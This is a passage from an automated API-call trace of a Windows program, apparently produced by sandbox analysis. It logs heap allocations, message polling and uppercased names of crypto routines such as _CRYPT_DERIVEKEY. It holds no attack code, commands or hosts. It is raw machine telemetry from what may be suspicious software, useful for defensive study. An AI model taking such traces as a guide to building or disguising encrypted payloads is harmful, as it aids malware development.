dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0210.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0210.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0210.068] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0210.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0210.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0210.068] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0210.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0210.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0210.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0210.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c28 [0210.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0210.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0210.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0210.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0210.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0210.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54be8 [0210.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0210.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0210.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0210.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50650 [0210.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0210.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0210.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0210.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0210.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0210.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0210.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0210.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0210.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0210.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0210.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0210.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0210.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0210.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0210.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50920 [0210.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0210.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0210.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0210.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0210.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0210.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0210.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0210.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0210.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0210.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0210.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0210.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0210.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0210.070] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0210.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0210.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0210.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0210.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0210.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0210.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0210.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0210.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0210.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0210.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0210.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0210.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0210.070] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0210.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0210.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0210.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0210.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0210.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0210.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0210.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0210.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0210.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0210.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0210.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0210.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0210.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0210.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0210.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0210.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0210.071] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0210.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0210.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0210.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0210.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0210.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0210.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0210.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0210.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0210.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0210.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0210.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0210.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0210.071] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0210.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0210.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0210.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0210.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0210.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0210.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0210.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0210.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0210.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0210.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0210.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0210.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0210.072] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0210.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0210.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0210.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0210.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0210.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0210.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0210.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0210.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0210.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0210.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0210.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0210.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0210.072] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0210.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0210.072] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0210.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0210.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0210.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50980 [0210.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0210.072] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0210.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fff0 [0210.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0210.073] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0210.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fff0 | out: hHeap=0x970000) returned 1 [0210.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0210.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50860 [0210.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0210.073] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0210.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0210.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0210.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0210.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0210.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0210.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0210.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0210.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0210.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0210.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0210.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0210.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0210.073] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0210.073] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0210.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0210.073] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0210.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0210.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0210.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0210.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0210.073] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0210.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0210.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0210.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0210.074] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0210.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0210.074] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0210.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0210.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0210.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0210.074] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0210.074] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0210.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0210.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0210.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0210.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0210.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0210.074] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0210.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0210.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0210.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50878 [0210.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0210.074] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0210.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0210.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0210.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0210.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0210.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0210.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0210.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0210.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0210.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0210.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0210.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0210.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0210.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0210.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0210.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0210.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0210.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0210.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0210.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0210.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0210.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0210.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0210.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0210.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0210.075] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0210.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0210.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0210.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50b60 [0210.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0210.075] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0210.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0210.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0210.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0210.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0210.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0210.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0210.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0210.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0210.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0210.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0210.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0210.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0210.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0210.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0210.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0210.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0210.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0210.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0210.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 